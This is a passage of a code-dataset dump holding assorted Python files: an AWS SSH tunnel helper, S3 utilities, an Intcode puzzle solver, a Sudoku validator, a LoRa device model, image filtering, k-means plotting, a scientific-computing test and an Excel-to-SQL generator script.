ec2_data[\"InstanceId\"] == instance_id\n\n        public_dns = ec2_data[\"PublicDnsName\"]\n    except (IndexError, KeyError) as err:\n        print(\"Unexpected error parsing the EC2 response: %r\" % err)\n        sys.exit(\"resp=%r\" % resp)\n\n    print(\"Connecting to instance %r\" % public_dns)\n\n    try:\n        subprocess.check_call(\n            [\n                \"ssh\",\n                # Use the provided SSH key to connect.\n                \"-i\",\n                key_path,\n                # Create a tunnel to port 8888 (Jupyter) on the remote host\n                \"-L\",\n                \"%s:%s:8888\" % (port, public_dns),\n                # Our data science AMI is based on Ubuntu\n                \"ubuntu@%s\" % public_dns,\n            ]\n        )\n    except subprocess.CalledProcessError as err:\n        sys.exit(err.returncode)\n\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except KeyboardInterrupt:\n        sys.exit(1)\n","sub_path":"data_science/scripts/create_tunnel_to_asg.py","file_name":"create_tunnel_to_asg.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"396590227","text":"import csv\nimport pandas as pd\n\nfile_seq= \"/home/anjali/06/datasets/sequence.csv\"\nfile_features= \"/home/anjali/06/datasets/features.csv\"\n\n# fh_seq= open(file,seq, \"r\")\n\nseq_info= pd.read_csv(file_seq)\nfeatures_info= pd.read_csv(file_features)\n\n\nnum = [[seq,db] for [seq,db] in zip(seq_info.sequence,seq_info.Database) if db==\"APD3\"]\nprint(len(num))\n\ns=list()\nfor item in num:\n    s.append(item[0])\n\ndf= seq_info\ndf2= features_info\ndf_apd3=dict()\ndf_apd3.update(df)\ndf_apd3.update(df2)\n\n# df_apd3.append(f for f in features_info.sequence if f in s)\n#\n# for f in features_info.sequence:\n#     if(f in s):\n#         print(f)\n\nf=list()\nf=features_info.sequence\n# print(len(features_info.sequence))\n\nprint(len(f))\n\nd=dict()\nfor item in f:\n    for seq in s:\n        if(item==seq):\n            d[item] = True  # assumption: the original line 'd=d.update' was a no-op; record matching sequences instead\n\n\n# # if(seq_info.Database==\"APD3\"):\n# #     df=dict()\n# #     df[\"sequence\"]=seq_info.sequence\n#\n# # d=dict()\n# # d[\"sequence\"][\"Database\"]= [[seq,db] for [seq,db] in zip(seq_info.sequence,seq_info.Database) if db==\"APD3\"]\n#\n#\n# # for f,s in zip(features_info.sequence, num):\n# #     # print(f)\n# #     # print(s[1])\n# #     if(f==s[0]):\n# #         print(f)\n# #         df_apd3.update({\"sequence\": \"f\"})\n#\n# # print(len(df_apd3[\"sequence\"]))\n# seq= list()\n# for item in num:\n#     seq.append(item[0])\n#\n# print(seq[0])\n#\n# d=dict()\n# d2=dict()\n# for f in features_info.sequence:\n#     if(f in seq):\n#         d[\"sequence\"]= f\n#         d2.append(d)\n","sub_path":"addfeatures.py","file_name":"addfeatures.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"627502133","text":"#!/usr/bin/env python3\nimport sys\n\nclass Amplifier:\n    '''\n    Amplifier described in the problem. 
Each amplifier program runs \n    on the existing Intcode computer.\n\n    Attributes:\n        phase: Integer indicating the phase setting for the amplifier.\n        input_: Integer input to the amplifier.\n        memory: List of integers for the Intcode program/memory.\n        output: Integer output of the amplifier.\n        position: Integer position in the memory of the last executed instruction.\n        halted: Boolean value indicating whether the program has halted or not.\n        first_input: Boolean to keep track of whether the current input value\n                     is phase setting or actual input instruction.\n    '''\n\n    def __init__(self, phase, input_, memory):\n        self.phase = phase\n        self.input_ = input_\n        self.memory = memory\n        self.output = None\n        self.position = 0\n        self.halted = False\n        self.first_input = True\n\n    def set_input(self, input_):\n        '''Set the value of the input to the amplifier with the given input value.'''\n\n        self.input_ = input_\n\n    def is_finished(self):\n        '''Return True if the Amplifier has finished execution.'''\n\n        return self.halted\n\n    def intcode(self):\n        '''Run the instructions in the memory on the Intcode computer.'''\n        \n        if self.is_finished():\n            return self.output\n\n        i = self.position\n\n        while i < len(self.memory) and not self.is_finished():\n            # instruction in the form ABCDE\n            s = str(abs(self.memory[i])).zfill(5)  # abs() guards against negative values; valid opcodes are non-negative\n            \n            opcode = int(s[-2:]) # DE\n            c = int(s[-3]) # C\n            b = int(s[-4]) # B\n            a = int(s[-5]) # A\n\n            if opcode == 1:\n                x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n                z = self.memory[i+3]\n                self.memory[z] = x + y\n                i += 4\n\n            if opcode == 2:\n                x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n                z = self.memory[i+3]\n                self.memory[z] = x * y\n                i += 4\n\n            if opcode == 3:\n                if self.first_input: \n                    self.memory[self.memory[i+1]] = self.phase\n                    self.first_input = False\n                else:\n                    self.memory[self.memory[i+1]] = self.input_\n                i += 2\n\n            if opcode == 4:\n                self.output = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                i += 2\n                break # pause execution here, move to next amplifier in the series\n            \n            if opcode == 5:\n                x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n                i = y if x != 0 else i+3\n            \n            if opcode == 6:\n                x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n                i = y if x == 0 else i+3\n            \n            if opcode == 7:\n                x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n                z = self.memory[i+3]\n                self.memory[z] = 1 if x < y else 0\n                i += 4\n            \n            if opcode == 8:\n                x = self.memory[i+1] if c == 1 else self.memory[self.memory[i+1]]\n                y = self.memory[i+2] if b == 1 else self.memory[self.memory[i+2]]\n                z = self.memory[i+3]\n                self.memory[z] = 1 if x == y else 0\n                i += 4\n\n            if opcode == 99:\n                self.halted = True\n                break\n        \n        self.position = i\n\n        return self.output\n\n\ndef done(amplifiers):\n    for a in amplifiers:\n        if not a.is_finished():\n            return False\n\n    return True\n\ndef generate_phase_permutation(items, permutation, chosen):\n    '''Generate all permutations of phase settings.'''\n\n    global program, max_thruster, max_phase\n\n    if len(permutation) == len(items):\n\n        amplifiers = []\n        output = 0\n\n        # Try a permutation of the phase settings.\n        
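# Score this ordering: build one amplifier per phase value, then run them in a feedback loop until every program halts.\n        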
for i in range(len(permutation)):\n amplifiers.append(Amplifier(permutation[i], 0, program.copy()))\n\n i = 0\n while not all(map(lambda amp: amp.is_finished(), amplifiers)):\n amplifiers[i].set_input(output)\n output = amplifiers[i].intcode()\n \n # feedback loop\n i = (i+1) % len(amplifiers)\n\n if max_thruster < output:\n max_thruster = output\n max_phase = permutation.copy()\n\n return\n\n for i in range(len(items)):\n if not chosen[i]:\n chosen[i] = True\n permutation.append(items[i])\n generate_phase_permutation(items, permutation, chosen)\n permutation.pop()\n chosen[i] = False\n\n\nfor line in sys.stdin:\n program = line\n\nprogram = list(map(int, program.split(',')))\n\ninput_ = 0\nmax_thruster = 0\nphases = list(range(5, 10))\nmax_phase = []\n\ngenerate_phase_permutation(phases, [], [False] * len(phases))\n\nprint(max_thruster, max_phase)\n","sub_path":"2019/day07/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"524799206","text":"#!/usr/bin/env python\nfrom jasp import *\nfrom ase import Atom, Atoms\nbond_lengths = [1.11, 1.12, 1.125, 1.13, 1.135, 1.14, 1.15]\nenergies = []\nfor d in bond_lengths: # possible bond lengths\n co = Atoms([Atom('C', [0, 0, 0]),\n Atom('O', [d, 0, 0])],\n cell=(6, 6, 6))\n with jasp('molecules/co-{0}'.format(d), # output dir\n xc='PBE',\n nbands=6,\n encut=450,\n ismear=1,\n sigma=0.01,\n atoms=co) as calc:\n try:\n e = co.get_potential_energy()\n energies.append(e)\n print('d = {0:1.2f} ang'.format(d))\n print('energy = {0:1.3f} eV'.format(e))\n print('forces = (eV/ang)\\n {0}'.format(co.get_forces()))\n print('') # blank line\n except (VaspSubmitted, VaspQueued):\n energies.append(None)\n pass\nif None not in energies:\n import matplotlib.pyplot as plt\n plt.plot(bond_lengths, energies, 'bo-')\n plt.xlabel(r'Bond length ($\\AA$)')\n plt.ylabel('Total energy (eV)')\n plt.savefig('images/co-bondlengths.png')","sub_path":"smol-4.py","file_name":"smol-4.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"152504410","text":"import boto3\n\ndef upload_file(file_name, bucket):\n \"\"\"\n Function to upload a file to an S3 bucket\n \"\"\"\n\n object_name = \"\".join(file_name.split())\n s3_client = boto3.client('s3')\n response = s3_client.upload_file(file_name, bucket, object_name)\n return response\n\ndef download_file(file_name, bucket):\n \"\"\"\n Function to download a given file from an S3 bucket\n \"\"\"\n s3 = boto3.resource('s3')\n output = f\"downloads/{file_name}\"\n s3.Bucket(bucket).download_file(file_name, output)\n\n return output\n\ndef list_files(bucket):\n \"\"\"\n Function to list files in a given S3 bucket\n \"\"\"\n s3 = boto3.client('s3')\n contents = []\n for item in s3.list_objects(Bucket=bucket)['Contents']:\n contents.append(item)\n\n return contents \n \ndef get_bucket_location(file_name, bucket):\n\n s3 = boto3.resource('s3') \n # location = s3.get_bucket_location(Bucket=bucket)['LocationConstraint']\n url = 'https://%s.s3-us-west-1.amazonaws.com/uploads/%s' % (bucket, file_name)\n\n return url ","sub_path":"audiology/posts/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"529408170","text":"from django.views.generic.list_detail import object_list, object_detail\nfrom django.shortcuts 
import render_to_response\nfrom django.http import HttpResponseRedirect\n\n\nfrom services.models import Company\nfrom services.forms import CompanyForm\n\n\ndef company_list(request):\n    queryset = Company.objects.all()\n    kwargs = {\n        \"template_object_name\": \"company\",\n        \"template_name\": \"services/company_list.html\",\n        \"extra_context\": {}, \n    }\n    return object_list(request, queryset, **kwargs)\n\ndef company_detail(request, slug):\n    queryset = Company.objects.all()\n    kwargs = {\n        \"template_object_name\": \"company\",\n        \"template_name\": \"services/company_detail.html\",\n        \"extra_context\": {},\n    }\n    return object_detail(request, queryset, slug=slug, **kwargs)\n\n\ndef company_create(request, template=\"services/company_create.html\"):\n    form = CompanyForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(form.next())\n    \n    ctx = {\n        \"form\": form\n    }\n    \n    return render_to_response(template, ctx)\n    \n    ","sub_path":"services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"411304015","text":"''' Testing module for nibetaseries.interfaces.nilearn '''\nimport os\nimport shutil\nimport nibabel as nib\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import pearsonr\nfrom scipy.optimize import minimize\n\nfrom ..nilearn import AtlasConnectivity\n\n\ndef test_atlas_connectivity():\n    # basedir\n    base_dir = os.path.join(os.getcwd(), 'tmp')\n    os.makedirs(base_dir, exist_ok=True)\n    # timeseries_file (beta series)\n    timeseries_file = os.path.join(base_dir,\n                                   'betaseries.nii.gz')\n    # atlas_file\n    atlas_file = os.path.join(base_dir,\n                              'atlas.nii.gz')\n    # atlas_lut\n    atlas_lut_file = os.path.join(base_dir,\n                                  'lut.tsv')\n\n    # dummy series of betas\n    # set how the betaseries will be defined\n    np.random.seed(3)\n    num_trials = 40\n    tgt_corr = 0.1\n    bs1 = np.random.rand(num_trials)\n    # create another betaseries with a target correlation\n    bs2 = minimize(lambda x: abs(tgt_corr - pearsonr(bs1, x)[0]),\n                   np.random.rand(num_trials)).x\n\n    # the two beta series combined into a single 4D array\n    bs_data = np.array([[[bs1, bs2]]])\n\n    # the nifti image\n    bs_img = nib.Nifti1Image(bs_data, np.eye(4))\n    bs_img.to_filename(timeseries_file)\n\n    # make atlas nifti\n    atlas_data = np.array([[[1, 2]]], dtype=np.int16)\n    atlas_img = nib.Nifti1Image(atlas_data, np.eye(4))\n    atlas_img.to_filename(atlas_file)\n\n    # make atlas lookup table\n    atlas_lut_df = pd.DataFrame({'index': [1, 2], 'regions': ['waffle', 'fries']})\n    atlas_lut_df.to_csv(atlas_lut_file, index=False, sep='\\t')\n\n    # expected output\n    pcorr = np.corrcoef(bs_data.squeeze())\n    np.fill_diagonal(pcorr, np.NaN)\n    regions = atlas_lut_df['regions'].values\n    pcorr_df = pd.DataFrame(pcorr, index=regions, columns=regions)\n    expected_zcorr_df = pcorr_df.apply(lambda x: (np.log(1 + x) - np.log(1 - x)) * 0.5)\n\n    # run instance of AtlasConnectivity\n    ac = AtlasConnectivity(timeseries_file=timeseries_file,\n                           atlas_file=atlas_file,\n                           atlas_lut=atlas_lut_file)\n\n    res = ac.run()\n\n    output_zcorr_df = pd.read_csv(res.outputs.correlation_matrix, na_values='n/a', delimiter='\\t', index_col=0)\n\n    # clean up files\n    shutil.rmtree(base_dir)\n    os.remove(res.outputs.correlation_matrix)\n\n    # test equality of the matrices up to 3 decimals\n    pd.testing.assert_frame_equal(output_zcorr_df, expected_zcorr_df,\n                                  
check_less_precise=3)\n","sub_path":"src/nibetaseries/interfaces/tests/test_nilearn.py","file_name":"test_nilearn.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"331212344","text":"''' remove salt and pepper noise from an image \nby applying median filter of size 3x3 and 5x5 '''\n\nimport cv2\nimport numpy as np \n\nimg = cv2.imread('sap.png',0)\nnew_img = cv2.imread('sap.png', 0)\nprop = img.shape\n\n#we take a window and find the median of intensity values \n#in that window and assign it to the current pixel\n\n############### 3x3 window ############### \nfor i in range(1, prop[0] - 1):\n    for j in range(1, prop[1] - 1):\n        \n        win = []\n        for x in range(i-1, i + 2):\n            for y in range(j-1, j+2):\n                win.append( img[x][y] )\n        #sort the values\n        win.sort()\n\n        new_img[i][j] = win[4]\n\ncv2.imwrite('3x3_median.jpg', new_img)\n\n\n############### 5x5 window ###############\nnew_img = cv2.imread('sap.png', 0)\n\n# start at index 2 so the 5x5 window (i-2 .. i+2) never wraps to negative indices\nfor i in range(2, prop[0] - 2):\n    for j in range(2, prop[1] - 2):\n        win = []\n        for x in range(i - 2, i + 3):\n            for y in range(j - 2, j + 3):\n                win.append(img[x][y])\n        #sort the values\n        win.sort()\n\n        new_img[i][j] = win[12]\n\ncv2.imwrite('5x5_median.jpg', new_img)\n\n\n \n","sub_path":"Day6/salt_pepper_noise.py","file_name":"salt_pepper_noise.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493334128","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 19 01:08:35 2016\n\n@author: owen\n\"\"\"\n# https://www.hrwhisper.me/leetcode-valid-sudoku-solver/\n#class Solution(object):\n#    def isValidSudoku(self, board):\n#        \"\"\"\n#        :type board: List[List[str]]\n#        :rtype: bool\n#        \"\"\"\n#        for i in range(9):\n#            for j in range(9):\n#                if board[i][j]!='.' 
and not self.check(i,j,board):\n# return False\n# return True\n# \n# def check(self,x,y,board):\n# for i in range(9):\n# if board[x][i]==board[x][y] and i!=y or board[i][y]==board[x][y] and i!=x:\n# return False\n# for i in range(3):\n# for j in range(3):\n# # if board[x//3*3+i][y//3*3+j]==board[x][y] and x!=(x//3*3+i) and y!=(y//3*3+j):\n# if board[int(x/3)*3+i][int(y/3)*3+j]==board[x][y] and x!=(int(x/3)*3+i) and y!=(int(y/3)*3+j):\n# return False\n# return True\n\nclass Solution:\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n if not board or not board[0]:\n return False\n \n m, n = len(board), len(board[0])\n if m != 9 or n != 9:\n return False\n \n # check each row \n for i in range(m):\n used = [False] * 10 # or use [False] * 9 for ord(board[i][j]) - ord('1')\n for j in range(n):\n if board[i][j] != '.':\n if used[int(board[i][j])]:\n return False\n used[int(board[i][j])] = True\n \n # check each column\n for j in range(n):\n used = [False] * 10\n for i in range(m):\n if board[i][j] != '.':\n if used[int(board[i][j])]:\n return False\n used[int(board[i][j])] = True\n \n # check each 3 by 3 cell\n for x in range(3):\n for y in range(3):\n used = [False] * 10\n for i in range(3 * x, 3 * x + 3):\n for j in range(3 * y, 3 * y + 3):\n if board[i][j] != '.':\n if used[int(board[i][j])]:\n return False\n used[int(board[i][j])] = True\n \n return True\n \nif __name__==\"__main__\":\n board=[['5','3','.','.','7','.','.','.','.'],\n ['6','.','.','1','9','5','.','.','.'],\n ['.','9','8','.','.','.','.','6','.'],\n ['8','.','.','.','6','.','.','.','3'],\n ['4','.','.','8','.','3','.','.','1'],\n ['7','.','.','.','2','.','.','.','6'],\n ['.','6','.','.','.','.','2','8','.'],\n ['.','.','.','4','1','9','.','.','5'],\n ['.','.','.','.','8','.','.','7','9']]\n print(Solution().isValidSudoku(board))","sub_path":"36. Valid Sudoku.py","file_name":"36. 
Valid Sudoku.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91001628","text":"from binascii import hexlify\nimport json\nimport enum\nfrom database.db1 import db1, Tables1, Channel1\nfrom database.db0 import db0, ConstDB\nfrom utils.log import logger\nfrom utils.errors import KeyDuplicateError, ReadOnlyDeny\nfrom userver.object.const import FieldDevice\nfrom userver.object.asserts import Assertions\nfrom datetime import datetime, timezone\nOTAA_EXPIRE = 5\n\nfrom sqlalchemy import Float, Column, BINARY, PrimaryKeyConstraint, Integer, ForeignKey, Numeric, Enum, DATETIME\nfrom sqlalchemy.dialects.mysql import INTEGER\nfrom sqlalchemy.orm import relationship, sessionmaker\nfrom sqlalchemy.ext.declarative import declared_attr, declarative_base\nfrom sqlalchemy import create_engine\nfrom config import SQLALCHEMY_DATABASE_URI\n\n\nBase = declarative_base()\n\n\nclass ActiveMode(enum.Enum):\n abp = 'abp'\n otaa = 'otaa'\n\n @staticmethod\n def assert_isinstanceof(value):\n assert isinstance(value, ActiveMode), '%r is not a valid ActiveMode' % value\n\n\nclass ClassType(Enum):\n a = 'A'\n b = 'B'\n c = 'C'\n\n\nclass Device(Base):\n __tablename__ = 'device'\n\n __redis_fields = (FieldDevice.app_eui,\n FieldDevice.addr,\n FieldDevice.nwkskey,\n FieldDevice.appskey,\n FieldDevice.fcnt_up,\n FieldDevice.fcnt_down,\n FieldDevice.dev_class,\n FieldDevice.adr,\n FieldDevice.check_fcnt,)\n\n __assert_switcher = {FieldDevice.active_at: Assertions.a_datetime,\n FieldDevice.active_mode: ActiveMode.assert_isinstanceof,\n FieldDevice.dev_eui: Assertions.a_eui_64,\n FieldDevice.addr: Assertions.a_dev_addr,\n FieldDevice.app_eui: Assertions.a_eui_64,\n FieldDevice.nwkskey: Assertions.a_nwkskey,\n FieldDevice.appskey: Assertions.a_appskey,\n FieldDevice.fcnt_up: Assertions.a_fcnt,\n FieldDevice.fcnt_down: Assertions.a_fcnt,\n FieldDevice.dev_class: Assertions.a_dev_class,\n FieldDevice.adr: Assertions.a_bool,\n FieldDevice.check_fcnt: Assertions.a_bool, }\n\n dev_eui = Column(BINARY(8), primary_key=True)\n app_eui = Column(BINARY(8), nullable=False)\n active_mode = Column(Enum(ActiveMode), nullable=True)\n active_at = Column(DATETIME)\n\n def active(self, addr, nwkskey, appskey=None, fcnt_up=0, fcnt_down=0, dev_class=ClassType.a, adr=True, check_fcnt=False):\n self.addr = addr\n self.nwkskey = nwkskey\n if appskey is None:\n appskey = b''\n self.appskey = appskey\n self.addr = addr\n self.addr = addr\n self.fcnt_up = fcnt_up\n self.fcnt_down = fcnt_down\n self.dev_class = dev_class\n self.adr = adr\n self.check_fcnt = check_fcnt\n key_eui = ConstDB.dev + hexlify(self.dev_eui).decode()\n pipe = db0.pipeline()\n pipe.hmset(key_eui, self.__zip_vars())\n pipe.set(ConstDB.addr + hexlify(self.addr).decode(), key_eui)\n pipe.execute()\n\n def __zip_vars(self):\n dd = {}\n for field in self.__redis_fields:\n value = getattr(self, field)\n if isinstance(value, enum.Enum):\n value = value.value\n elif isinstance(value, bool):\n value = value.real\n dd[field] = value\n return dd\n\n def publish(self):\n message = {'dev_eui': hexlify(self.dev_eui).decode(),\n 'addr': hexlify(self.addr).decode(),\n 'nwkskey': hexlify(self.nwkskey).decode(),\n 'appskey': hexlify(self.appskey).decode(),\n 'ts':self.active_at.replace(tzinfo=timezone.utc).timestamp(),\n }\n db0.publish(Channel1.join_success_alarm + hexlify(self.app_eui).decode(), json.dumps(message))\n\nclass JoiningDev:\n fields = (FieldDevice.app_eui, FieldDevice.addr)\n\n 
__vars_can_write = (FieldDevice.nwkskey, FieldDevice.appskey)\n\n _assert_switcher = {FieldDevice.dev_eui: Assertions.a_eui_64,\n FieldDevice.app_eui: Assertions.a_eui_64,\n FieldDevice.addr: Assertions.a_dev_addr,\n FieldDevice.nwkskey: Assertions.a_nwkskey,\n FieldDevice.appskey: Assertions.a_appskey\n }\n\n def __setattr__(self, key, value):\n if hasattr(self, key):\n raise ReadOnlyDeny\n assert_method = self._assert_switcher.get(key)\n if assert_method is not None:\n assert_method(value)\n super().__setattr__(key, value)\n\n def __init__(self, app_eui, dev_eui, addr, nwkskey=None, appskey=None):\n self.app_eui = app_eui\n self.dev_eui = dev_eui\n self.addr = addr\n if nwkskey is not None:\n self.nwkskey = nwkskey\n if appskey is not None:\n self.appskey = appskey\n\n def __zip_vars(self):\n return dict(zip(self.fields, (self.app_eui, self.addr)))\n\n def __zip_vars_can_write(self):\n return dict(zip(self.__vars_can_write, (self.nwkskey, self.appskey)))\n\n def save(self):\n key_eui = Tables1.dev + hexlify(self.dev_eui).decode()\n key_addr = Tables1.addr + hexlify(self.addr).decode()\n # if db1.exists(key_eui) or db0.exists(key_eui):\n if db1.exists(key_eui):\n raise KeyDuplicateError(key_eui)\n if db1.exists(key_addr) or db0.exists(key_addr):\n raise KeyDuplicateError(key_addr)\n pipe = db1.pipeline()\n pipe.hmset(key_eui, self.__zip_vars())\n pipe.set(key_addr, key_eui)\n pipe.expire(key_addr, OTAA_EXPIRE-2)\n pipe.expire(key_eui, OTAA_EXPIRE-2)\n pipe.execute()\n\n def update(self):\n db1.hmset(Tables1.dev + hexlify(self.dev_eui).decode(), self.__zip_vars_can_write())\n\n def delete(self):\n key_eui = Tables1.dev + hexlify(self.dev_eui).decode()\n key_addr = Tables1.addr + hexlify(self.addr).decode()\n pipe = db1.pipeline()\n pipe.delete(key_eui)\n pipe.delete(key_addr)\n pipe.execute()\n\n class objects:\n @staticmethod\n def get(dev_eui):\n info = db1.hgetall(Tables1.dev + hexlify(dev_eui).decode())\n try:\n join_dev = JoiningDev(dev_eui=dev_eui, app_eui=info[b'app_eui'], addr=info[b'addr'], nwkskey=info.get(b'nwkskey'), appskey=info.get(b'appskey'))\n return join_dev\n except (KeyError, AssertionError) as error:\n logger.error('Join Success' + str(error))\n\n\n# Create an engine that stores data in the local directory's\n# sqlalchemy_example.db file.\nengine = create_engine(SQLALCHEMY_DATABASE_URI)\n\nDBSession = sessionmaker(bind=engine)\n\ndb_session = DBSession()","sub_path":"UServer/ammeter/objects/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":6971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"629575901","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.cluster import KMeans\n\nwith open('PizzaFeatures.txt') as f:\n data = [line.replace('\\n', '').split(',') for line in f]\n\ndata = np.array(data, dtype=float)\n\nX = data[:4000]\nX = X[:, 0:7]\n\nkmeans = KMeans(n_clusters=2)\nkmeans = kmeans.fit(X)\nlabels = kmeans.predict(X)\ncentroids = kmeans.cluster_centers_\n\nfirst = 0\nsecond = 3\n\nplt.scatter(X[:, first], X[:, second], c=labels, s=25, cmap='viridis')\nplt.scatter(centroids[:,0], centroids[:, 1], c='black', s=200, alpha=0.5)\n\nX = data[:4000]\nX = X[:, 0:9]\ni = 0\nwhile i < len(X):\n if X[i, 8] == 0:\n X = np.delete(X, i, axis=0)\n i = i - 1\n i = i + 1\nplt.scatter(X[:, first], X[:, second], s=2, cmap='Blues')\n\n#X =
np.array(list(zip(f1[4001:4041],f2[4001:4041],f3[4001:4041],f4[4001:4041],f5[4001:4041],f6[4001:4041],f7[4001:4041],f8[4001:4041])))\n#X = data[4001:4041]\n#X = X[:, 1:7]\n#X = np.sort(X)\n#prediction = kmeans.predict(X);\n#plt.scatter(X[:,2], X[:, 4], c=prediction, s=50, cmap='viridis')\n#plt.scatter(centroids[:,0], centroids[:, 1], c='black', s=200, alpha=0.5)\n#plt.axis('off')\nplt.ylabel(\"Account Age at Request\")\nplt.xlabel(\"Upvotes\")\nplt.show()","sub_path":"MachineLearning/k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"645303496","text":"date = 2\nmonthLength = {\n 1:31,\n 2:28,\n 3:31,\n 4:30,\n 5:31,\n 6:30,\n 7:31,\n 8:31,\n 9:30,\n 10:31,\n 11:30,\n 12:31,\n}\n\nsundays = 0\n\ndef isLeapYear(number):\n if number % 4 == 0 and (number % 100 != 0 or number % 400 == 0):\n return True\n else:\n return False\n\nfor year in range(1900,2001):\n for month in range(1,13):\n if isLeapYear(year) == True and (month == 2):\n addnumb = 1\n else:\n addnumb = 0\n for day in range(1, (monthLength[month] + addnumb) + 1):\n if date > 7:\n date = 1\n if date == 1:\n if day == 1 and year > 1900:\n sundays +=1\n date = date + 1\n\nprint(sundays) #Sundays falling on the first of the month during 1901-2000; 1 Jan 1900 was a Monday (date 2), so date 1 is Sunday. Prints the expected answer, 171","sub_path":"Problem19.py","file_name":"Problem19.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301547151","text":"import xlrd\nimport datetime\n\n\ndef pm_product_tree_node_cfg(output_file,sheet,start_num,end_num=None):\n '''产品树配置 '''\n print('--产品树配置\n')\n if end_num is None:\n end_num = start_num+1\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_TREE_NODE_CFG WHERE NODE_ID={0} AND PARENT_ID={1};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_TREE_NODE_CFG (NODE_ID, PARENT_ID, NAME, IS_LEAF, SEQUENCE, CREATE_TIME, PRODUCT_MAIN_CLASS) \\nVALUES ({0}, {1}, '{2}', {3}, '{4}', SYSDATE, null);\"\n def is_num(s):\n try:\n int(s)\n return True\n except ValueError:\n if s != '':\n print(s)\n return False\n\n col1_tmp = ''\n leaf_seq = 0\n for row_index in range(1, sheet.nrows):\n col1 = sheet.cell_value(row_index, 0)\n if col1 == '':\n col1 = col1_tmp\n else:\n col1_tmp = col1\n col5 = sheet.cell_value(row_index, 4)\n col6 = sheet.cell_value(row_index, 5)\n if is_num(col5):\n col5 = int(col5)\n if col5 > 100:\n leaf_seq += 1\n if row_index >= start_num and row_index < end_num:\n print(del_content.format(col5, col1), file=output_file)\n print(sql_content.format(col5, col1, col6, 1, leaf_seq), file=output_file)\n\n col7 = sheet.cell_value(row_index, 6)\n col8 = sheet.cell_value(row_index, 7)\n if is_num(col7):\n col7 = int(col7)\n if col7 > 100:\n leaf_seq += 1\n if row_index >= start_num and row_index < end_num:\n print(del_content.format(col7, col1), file=output_file)\n print(sql_content.format(col7, col1, col8, 1, leaf_seq), file=output_file)\n\n col9 = sheet.cell_value(row_index, 8)\n col10 = sheet.cell_value(row_index, 9)\n if is_num(col9):\n col9 = int(col9)\n if col9 > 100:\n leaf_seq += 1\n if row_index >= start_num and row_index < end_num:\n print(del_content.format(col9, col1), file=output_file)\n print(sql_content.format(col9, col1, col10, 1, leaf_seq), file=output_file)\n\n\ndef pm_product_def(output_file,sheet,start_num,end_num=None):\n '''产品定义 '''\n print('--产品定义\n')\n if end_num is None:\n end_num = start_num+1\n def getType(value):\n if value == '普通产品':\n return 8001\n elif
value == '产品包':\n return 8004\n del_content = \"DELETE FROM PRODUCT.PM_PRODUCT_DEF WHERE PRODUCT_ID={};\"\n sql_content = \"INSERT INTO PRODUCT.PM_PRODUCT_DEF (PRODUCT_ID, NAME, PRODUCT_CODE, DESCRIPTION, STATUS, PRODUCT_TYPE, INURE_TIME, EXPIRE_TIME, SUB_PRODUCT_TYPE, PRODUCT_CLASS, PRODUCT_MANAGER_ID, PRODUCT_SUPPORT_ID, PRODUCT_FILE, PRODUCT_LOGO_FILE) VALUES ({}, '{}', '{}', '{}', 1, {}, SYSDATE, TO_DATE('3000-01-01 00:00:00', 'YYYY-MM-DD HH24:MI:SS'), '{}', '{}', '{}', '{}', null, null);\"\n for row_index in range(start_num,end_num):\n product_id = sheet.cell_value(row_index,1)\n name = sheet.cell_value(row_index,2)\n product_code = sheet.cell_value(row_index,9)\n product_type = getType(sheet.cell_value(row_index,11))\n product_class = sheet.cell_value(row_index,22)\n sub_product_type = sheet.cell_value(row_index,23)\n manager_id = sheet.cell_value(row_index,26)\n support_id = sheet.cell_value(row_index,28)\n print(del_content.format(product_id),file=output_file)\n 